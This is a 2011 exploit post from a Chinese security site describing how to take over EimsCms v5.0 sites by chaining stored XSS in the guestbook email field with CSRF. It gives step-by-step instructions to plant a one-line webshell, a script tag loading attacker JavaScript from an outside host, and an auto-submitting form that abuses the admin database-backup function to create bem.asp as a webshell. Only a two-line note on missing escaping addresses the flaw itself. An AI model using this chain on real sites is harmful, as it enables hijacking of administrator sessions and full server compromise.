首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
EimsCms v5.0 XSS+CSRF=GetShell
来源:vfocus.net 作者:B0mbErM@n 发布时间:2011-01-31  

未对Book.asp邮箱等处进行符号转义,导致XSS跨站执行漏洞。
 

------GetShell-----


[1] 在Book.asp的邮箱处填写一句话,提交
[2] 在Book.asp的邮箱处填写XSS语句中的CSRF
[3] 等待管理员触发XSS语句,然后一句话连接bem.asp
[要求] 默认后台管理目录/数据库
[注意] 管理触发XSS是在后台查看留言


------ X S S -----


Book.asp
在邮箱里处写入XSS语句即可
用XSS调用CSRF,例如把CSRF去转成JS的则用
<SCRIPT SRC=http://521.im/xss.js></SCRIPT&gt;


----- CSRF -----


<form method="post" action="http://127.0.0.1:99/admin/DataM.asp?eims=Data&Action=bfstart">
<input name="olddata" type="text" id="olddata" value="../Data/eimsCMS.mdb" size="45" readonly>
<input name="newdata" type="text" id="newdata" size="45" value="../bem.asp">
<input type="submit" name="Submit" value="开始备份" id="bem"/>
</form>
<script>
document.getElementByIdx_x('bem').click();
</script>


----- 分析 -----


未对Book.asp邮箱等处进行符号转义
未过滤提交语句
 

作者:B0mbErM@n


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·风神新闻管理静态版1.7漏洞
·DEDECMS恶作剧漏洞&任意修改文章
·DEDECMS 0DAY
·ecshop支付漏洞最新可用EXP利用
·Diy-Page v8.2 两个注入漏洞分析
·UCenter Home 2.0 鸡叻 SQL 注入
·HDWiKi V 5.0 本地包含0Day
·Exploit Linux Kernel Slub Over
·无忧购物系统ASP时尚版存在后门
·深圳迪蒙网络科技企业网站管理系
·华夏外挂下载系统2.0漏洞利用
·GnuBoard本地文件包含漏洞
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved